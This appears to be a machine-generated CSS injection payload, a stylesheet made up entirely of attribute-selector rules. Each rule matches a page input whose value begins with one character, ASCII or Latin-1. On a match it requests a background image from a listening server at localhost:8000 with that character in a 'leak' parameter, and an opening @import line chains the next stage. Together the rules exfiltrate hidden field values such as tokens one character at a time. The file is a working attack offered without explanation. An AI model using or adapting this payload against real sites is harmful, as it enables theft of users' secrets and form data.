@import url("http://localhost:8000/?l=2");
input[value^="!"] {background: url("http://localhost:8000/?leak=!&q=0.06961614095214896");}
input[value^="\""] {background: url("http://localhost:8000/?leak=\"&q=0.17730944147496075");}
input[value^="#"] {background: url("http://localhost:8000/?leak=#&q=0.6642943232978589");}
input[value^="$"] {background: url("http://localhost:8000/?leak=$&q=0.2735811794684462");}
input[value^="%"] {background: url("http://localhost:8000/?leak=%&q=0.19962232919350198");}
input[value^="&"] {background: url("http://localhost:8000/?leak=&&q=0.6413539326764466");}
input[value^="'"] {background: url("http://localhost:8000/?leak='&q=0.779483104666286");}
input[value^="("] {background: url("http://localhost:8000/?leak=(&q=0.3770308790931236");}
input[value^=")"] {background: url("http://localhost:8000/?leak=)&q=0.5402388667759199");}
input[value^="*"] {background: url("http://localhost:8000/?leak=*&q=0.9047817287764788");}
input[value^="+"] {background: url("http://localhost:8000/?leak=+&q=0.8416265809557939");}
input[value^=","] {background: url("http://localhost:8000/?leak=,&q=0.4576169875327516");}
input[value^="-"] {background: url("http://localhost:8000/?leak=-&q=0.9814097153146941");}
input[value^="."] {background: url("http://localhost:8000/?leak=.&q=0.1244413951189185");}
input[value^="/"] {background: url("http://localhost:8000/?leak=/&q=0.9169301690860223");}
input[value^="0"] {background: url("http://localhost:8000/?leak=0&q=0.3696228949599951");}
input[value^="1"] {background: url("http://localhost:8000/?leak=1&q=0.15262327472171444");}
input[value^="2"] {background: url("http://localhost:8000/?leak=2&q=0.7715346878855585");}
input[value^="3"] {background: url("http://localhost:8000/?leak=3&q=0.8673508487146879");}
input[value^="4"] {background: url("http://localhost:8000/?leak=4&q=0.4192800445191551");}
input[value^="5"] {background: url("http://localhost:8000/?leak=5&q=0.6386252521601976");}
input[value^="6"] {background: url("http://localhost:8000/?leak=6&q=0.9624877861626813");}
input[value^="7"] {background: url("http://localhost:8000/?leak=7&q=0.48447677915738585");}
input[value^="8"] {background: url("http://localhost:8000/?leak=8&q=0.037398866432642563");}
input[value^="9"] {background: url("http://localhost:8000/?leak=9&q=0.5812348185119347");}
input[value^=":"] {background: url("http://localhost:8000/?leak=:&q=0.4632804430014468");}
input[value^=";"] {background: url("http://localhost:8000/?leak=;&q=0.145187345817837");}
input[value^="<"] {background: url("http://localhost:8000/?leak=<&q=0.04402355804619984");}
input[value^="="] {background: url("http://localhost:8000/?leak==&q=0.14067682724434882");}
input[value^=">"] {background: url("http://localhost:8000/?leak=>&q=0.05097613522578426");}
input[value^="?"] {background: url("http://localhost:8000/?leak=?&q=0.3040379997510736");}
input[value^="@"] {background: url("http://localhost:8000/?leak=@&q=0.40309290191409297");}
input[value^="A"] {background: url("http://localhost:8000/?leak=A&q=0.6624805268909304");}
input[value^="B"] {background: url("http://localhost:8000/?leak=B&q=0.9612644434870528");}
input[value^="C"] {background: url("http://localhost:8000/?leak=C&q=0.9399218706921293");}
input[value^="D"] {background: url("http://localhost:8000/?leak=D&q=0.26452490316065025");}
input[value^="E"] {background: url("http://localhost:8000/?leak=E&q=0.12050040663386397");}
input[value^="F"] {background: url("http://localhost:8000/?leak=F&q=0.9656730470777868");}
input[value^="G"] {background: url("http://localhost:8000/?leak=G&q=0.3784942069140056");}
input[value^="H"] {background: url("http://localhost:8000/?leak=H&q=0.49761166180056393");}
input[value^="I"] {background: url("http://localhost:8000/?leak=I&q=0.28895137930646997");}
input[value^="J"] {background: url("http://localhost:8000/?leak=J&q=0.9977388624399215");}
input[value^="K"] {background: url("http://localhost:8000/?leak=K&q=0.6650846042053273");}
input[value^="L"] {background: url("http://localhost:8000/?leak=L&q=0.08470231053293364");}
input[value^="M"] {background: url("http://localhost:8000/?leak=M&q=0.4658801459476305");}
input[value^="N"] {background: url("http://localhost:8000/?leak=N&q=0.8730362042303992");}
input[value^="O"] {background: url("http://localhost:8000/?leak=O&q=0.783822104043246");}
input[value^="P"] {background: url("http://localhost:8000/?leak=P&q=0.10790553429488114");}
input[value^="Q"] {background: url("http://localhost:8000/?leak=Q&q=0.72284917318047");}
input[value^="R"] {background: url("http://localhost:8000/?leak=R&q=0.2902674449864202");}
input[value^="S"] {background: url("http://localhost:8000/?leak=S&q=0.19195352668112786");}
input[value^="T"] {background: url("http://localhost:8000/?leak=T&q=0.3189880195720072");}
input[value^="U"] {background: url("http://localhost:8000/?leak=U&q=0.16696203381455166");}
input[value^="V"] {background: url("http://localhost:8000/?leak=V&q=0.0650794110764219");}
input[value^="W"] {background: url("http://localhost:8000/?leak=W&q=0.318374595014822");}
input[value^="X"] {background: url("http://localhost:8000/?leak=X&q=0.10940237233262007");}
input[value^="Y"] {background: url("http://localhost:8000/?leak=Y&q=0.4525381448121122");}
input[value^="Z"] {background: url("http://localhost:8000/?leak=Z&q=0.2523013574231219");}
input[value^="["] {background: url("http://localhost:8000/?leak=[&q=0.578984825126702");}
input[value^="\\"] {background: url("http://localhost:8000/?leak=\\&q=0.7279650528576906");}
input[value^="]"] {background: url("http://localhost:8000/?leak=]&q=0.2677462066974807");}
input[value^="^"] {background: url("http://localhost:8000/?leak=^&q=0.737597384653488");}
input[value^="_"] {background: url("http://localhost:8000/?leak=_&q=0.9164909528816154");}
input[value^="`"] {background: url("http://localhost:8000/?leak=`&q=0.2685855932066765");}
input[value^="a"] {background: url("http://localhost:8000/?leak=a&q=0.16182622713726458");}
input[value^="b"] {background: url("http://localhost:8000/?leak=b&q=0.3461157479931223");}
input[value^="c"] {background: url("http://localhost:8000/?leak=c&q=0.14185785797082895");}
input[value^="d"] {background: url("http://localhost:8000/?leak=d&q=0.22878401439231166");}
input[value^="e"] {background: url("http://localhost:8000/?leak=e&q=0.10700524456682392");}
input[value^="f"] {background: url("http://localhost:8000/?leak=f&q=0.9540914405385212");}
input[value^="g"] {background: url("http://localhost:8000/?leak=g&q=0.4324540239872494");}
input[value^="h"] {background: url("http://localhost:8000/?leak=h&q=0.7073690472461744");}
input[value^="i"] {background: url("http://localhost:8000/?leak=i&q=0.6454345144598841");}
input[value^="j"] {background: url("http://localhost:8000/?leak=j&q=0.6795505623602704");}
input[value^="k"] {background: url("http://localhost:8000/?leak=k&q=0.09468711132574548");}
input[value^="l"] {background: url("http://localhost:8000/?leak=l&q=0.7934572550797987");}
input[value^="m"] {background: url("http://localhost:8000/?leak=m&q=0.5128418009231812");}
input[value^="n"] {background: url("http://localhost:8000/?leak=n&q=0.8864701798638708");}
input[value^="o"] {background: url("http://localhost:8000/?leak=o&q=0.05914787541595934");}
input[value^="p"] {background: url("http://localhost:8000/?leak=p&q=0.31441904415886635");}
input[value^="q"] {background: url("http://localhost:8000/?leak=q&q=0.24422621687059576");}
input[value^="r"] {background: url("http://localhost:8000/?leak=r&q=0.14895645184684425");}
input[value^="s"] {background: url("http://localhost:8000/?leak=s&q=0.8524284291833966");}
input[value^="t"] {background: url("http://localhost:8000/?leak=t&q=0.027029654958917737");}
input[value^="u"] {background: url("http://localhost:8000/?leak=u&q=0.4636399389212771");}
input[value^="v"] {background: url("http://localhost:8000/?leak=v&q=0.6034403695325108");}
input[value^="w"] {background: url("http://localhost:8000/?leak=w&q=0.2104959431430966");}
input[value^="x"] {background: url("http://localhost:8000/?leak=x&q=0.40995355541243717");}
input[value^="y"] {background: url("http://localhost:8000/?leak=y&q=0.5309765763464864");}
input[value^="z"] {background: url("http://localhost:8000/?leak=z&q=0.8958427060250933");}
input[value^="{"] {background: url("http://localhost:8000/?leak={&q=0.43614614986312583");}
input[value^="|"] {background: url("http://localhost:8000/?leak=|&q=0.2305398223095656");}
input[value^="}"] {background: url("http://localhost:8000/?leak=}&q=0.7454650336371873");}
input[value^="~"] {background: url("http://localhost:8000/?leak=~&q=0.7479102886267519");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.2446912798856613");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.6850838879837504");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.392755500887523");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.09567396294006825");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.20927707991889988");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.48172123488549934");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.7577317375798254");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.9289998211872952");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.08925520681487398");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.35108388431416926");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.13849721768931333");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.8966274386430078");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.9712618701661413");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.09298420571846111");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.30851112988502405");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.17358251303240668");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.5720771779205742");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.9574726279590906");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.917282405486892");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.49050575076988623");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.7979359378883575");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.5798928935888659");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.9747659798347486");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.8729587321638026");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.8780609398637955");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.6199261088119481");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.5652753930354097");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.05814312646728115");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.33383277931912514");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.8759350068036937");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.15141285012767458");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.17596292099548605");}
input[value^=""] {background: url("http://localhost:8000/?leak=&q=0.30838587561944797");}
input[value^=" "] {background: url("http://localhost:8000/?leak= &q=0.3607840260125763");}
input[value^="¡"] {background: url("http://localhost:8000/?leak=¡&q=0.10058101565928923");}
input[value^="¢"] {background: url("http://localhost:8000/?leak=¢&q=0.12200848737755643");}
input[value^="£"] {background: url("http://localhost:8000/?leak=£&q=0.8912852830304898");}
input[value^="¤"] {background: url("http://localhost:8000/?leak=¤&q=0.4087463708236936");}
input[value^="¥"] {background: url("http://localhost:8000/?leak=¥&q=0.1091412404597607");}
input[value^="¦"] {background: url("http://localhost:8000/?leak=¦&q=0.4916760579126769");}
input[value^="§"] {background: url("http://localhost:8000/?leak=§&q=0.2735326379155283");}
input[value^="¨"] {background: url("http://localhost:8000/?leak=¨&q=0.9521992578467484");}
input[value^="©"] {background: url("http://localhost:8000/?leak=©&q=0.3043319451131046");}
input[value^="ª"] {background: url("http://localhost:8000/?leak=ª&q=0.4731547970179395");}
input[value^="«"] {background: url("http://localhost:8000/?leak=«&q=0.15177976846015362");}
input[value^="¬"] {background: url("http://localhost:8000/?leak=¬&q=0.1668792339570262");}
input[value^="­"] {background: url("http://localhost:8000/?leak=­&q=0.8712671849865545");}
input[value^="®"] {background: url("http://localhost:8000/?leak=®&q=0.9020762183068929");}
input[value^="¯"] {background: url("http://localhost:8000/?leak=¯&q=0.12098647466777401");}
input[value^="°"] {background: url("http://localhost:8000/?leak=°&q=0.16119421149459612");}
input[value^="±"] {background: url("http://localhost:8000/?leak=±&q=0.33892904688041336");}
input[value^="²"] {background: url("http://localhost:8000/?leak=²&q=0.2850313270009863");}
input[value^="³"] {background: url("http://localhost:8000/?leak=³&q=0.1534839081847803");}
input[value^="´"] {background: url("http://localhost:8000/?leak=´&q=0.6131347116993355");}
input[value^="µ"] {background: url("http://localhost:8000/?leak=µ&q=0.9266126465788742");}
input[value^="¶"] {background: url("http://localhost:8000/?leak=¶&q=0.5201073448030773");}
input[value^="·"] {background: url("http://localhost:8000/?leak=·&q=0.3476058532748634");}
input[value^="¸"] {background: url("http://localhost:8000/?leak=¸&q=0.67626653390278");}
input[value^="¹"] {background: url("http://localhost:8000/?leak=¹&q=0.8249793644506735");}
input[value^="º"] {background: url("http://localhost:8000/?leak=º&q=0.6938020538585838");}
input[value^="»"] {background: url("http://localhost:8000/?leak=»&q=0.6252790408845657");}
input[value^="¼"] {background: url("http://localhost:8000/?leak=¼&q=0.05130578599575508");}
input[value^="½"] {background: url("http://localhost:8000/?leak=½&q=0.3636084705705631");}
input[value^="¾"] {background: url("http://localhost:8000/?leak=¾&q=0.22689760941403758");}
input[value^="¿"] {background: url("http://localhost:8000/?leak=¿&q=0.0938617290405428");}
input[value^="À"] {background: url("http://localhost:8000/?leak=À&q=0.5291427405980973");}
input[value^="Á"] {background: url("http://localhost:8000/?leak=Á&q=0.8734992071931722");}
input[value^="Â"] {background: url("http://localhost:8000/?leak=Â&q=0.41512645943344983");}
input[value^="Ã"] {background: url("http://localhost:8000/?leak=Ã&q=0.1946809713091231");}
input[value^="Ä"] {background: url("http://localhost:8000/?leak=Ä&q=0.8036191413227018");}
input[value^="Å"] {background: url("http://localhost:8000/?leak=Å&q=0.6417951467607228");}
input[value^="Æ"] {background: url("http://localhost:8000/?leak=Æ&q=0.7677595440384644");}
input[value^="Ç"] {background: url("http://localhost:8000/?leak=Ç&q=0.03769595679582238");}
input[value^="È"] {background: url("http://localhost:8000/?leak=È&q=0.30123184905382994");}
input[value^="É"] {background: url("http://localhost:8000/?leak=É&q=0.5115602296932393");}
input[value^="Ê"] {background: url("http://localhost:8000/?leak=Ê&q=0.2597403590669647");}
input[value^="Ë"] {background: url("http://localhost:8000/?leak=Ë&q=0.02303901521382623");}
input[value^="Ì"] {background: url("http://localhost:8000/?leak=Ì&q=0.05704853683585864");}
input[value^="Í"] {background: url("http://localhost:8000/?leak=Í&q=0.05539859431690619");}
input[value^="Î"] {background: url("http://localhost:8000/?leak=Î&q=0.6269539114559177");}
input[value^="Ï"] {background: url("http://localhost:8000/?leak=Ï&q=0.28851249961693193");}
input[value^="Ð"] {background: url("http://localhost:8000/?leak=Ð&q=0.6115748965294245");}
input[value^="Ñ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.04667684143302053");}
input[value^="Ò"] {background: url("http://localhost:8000/?leak=Ò&q=0.5245909653679417");}
input[value^="Ó"] {background: url("http://localhost:8000/?leak=Ó&q=0.19757477602522133");}
input[value^="Ô"] {background: url("http://localhost:8000/?leak=Ô&q=0.9164858152535753");}
input[value^="Õ"] {background: url("http://localhost:8000/?leak=Õ&q=0.7917685240644265");}
input[value^="Ö"] {background: url("http://localhost:8000/?leak=Ö&q=0.48400886155897505");}
input[value^="×"] {background: url("http://localhost:8000/?leak=×&q=0.3365149877623199");}
input[value^="Ø"] {background: url("http://localhost:8000/?leak=Ø&q=0.3252136211369201");}
input[value^="Ù"] {background: url("http://localhost:8000/?leak=Ù&q=0.39967912246849635");}
input[value^="Ú"] {background: url("http://localhost:8000/?leak=Ú&q=0.9005773007662443");}
input[value^="Û"] {background: url("http://localhost:8000/?leak=Û&q=0.9333214796179152");}
input[value^="Ü"] {background: url("http://localhost:8000/?leak=Ü&q=0.4249539911541613");}
input[value^="Ý"] {background: url("http://localhost:8000/?leak=Ý&q=0.9778609932951208");}
input[value^="Þ"] {background: url("http://localhost:8000/?leak=Þ&q=0.7288309116645304");}
input[value^="ß"] {background: url("http://localhost:8000/?leak=ß&q=0.6795039238266081");}
input[value^="à"] {background: url("http://localhost:8000/?leak=à&q=0.824402527017347");}
input[value^="á"] {background: url("http://localhost:8000/?leak=á&q=0.4124733551768669");}
input[value^="â"] {background: url("http://localhost:8000/?leak=â&q=0.5370372424736132");}
input[value^="ã"] {background: url("http://localhost:8000/?leak=ã&q=0.37335470514607216");}
input[value^="ä"] {background: url("http://localhost:8000/?leak=ä&q=0.28601128250923447");}
input[value^="å"] {background: url("http://localhost:8000/?leak=å&q=0.19133797674807806");}
input[value^="æ"] {background: url("http://localhost:8000/?leak=æ&q=0.09448989730203627");}
input[value^="ç"] {background: url("http://localhost:8000/?leak=ç&q=0.9313020773081868");}
input[value^="è"] {background: url("http://localhost:8000/?leak=è&q=0.5554582669221269");}
input[value^="é"] {background: url("http://localhost:8000/?leak=é&q=0.4712401938338273");}
input[value^="ê"] {background: url("http://localhost:8000/?leak=ê&q=0.5840532347790124");}
input[value^="ë"] {background: url("http://localhost:8000/?leak=ë&q=0.159493691816037");}
input[value^="ì"] {background: url("http://localhost:8000/?leak=ì&q=0.8359122561168542");}
input[value^="í"] {background: url("http://localhost:8000/?leak=í&q=0.05781201990099305");}
input[value^="î"] {background: url("http://localhost:8000/?leak=î&q=0.29148782181939503");}
input[value^="ï"] {background: url("http://localhost:8000/?leak=ï&q=0.717500627642063");}
input[value^="ð"] {background: url("http://localhost:8000/?leak=ð&q=0.5238900880332187");}
input[value^="ñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.07823261501580947");}
input[value^="ò"] {background: url("http://localhost:8000/?leak=ò&q=0.16694589068347332");}
input[value^="ó"] {background: url("http://localhost:8000/?leak=ó&q=0.39960426897710377");}
input[value^="ô"] {background: url("http://localhost:8000/?leak=ô&q=0.05549288534486907");}
input[value^="õ"] {background: url("http://localhost:8000/?leak=õ&q=0.5243751835844199");}
input[value^="ö"] {background: url("http://localhost:8000/?leak=ö&q=0.9384114078150887");}
input[value^="÷"] {background: url("http://localhost:8000/?leak=÷&q=0.3248315836453728");}
input[value^="ø"] {background: url("http://localhost:8000/?leak=ø&q=0.3225547890509761");}
input[value^="ù"] {background: url("http://localhost:8000/?leak=ù&q=0.812531211475177");}
input[value^="ú"] {background: url("http://localhost:8000/?leak=ú&q=0.8452237003086529");}
input[value^="û"] {background: url("http://localhost:8000/?leak=û&q=0.3285179490394352");}
input[value^="ü"] {background: url("http://localhost:8000/?leak=ü&q=0.13075790820763977");}
input[value^="ý"] {background: url("http://localhost:8000/?leak=ý&q=0.7104398999490227");}
input[value^="þ"] {background: url("http://localhost:8000/?leak=þ&q=0.6776147287451959");}
input[value^="ÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.570830199517486");}
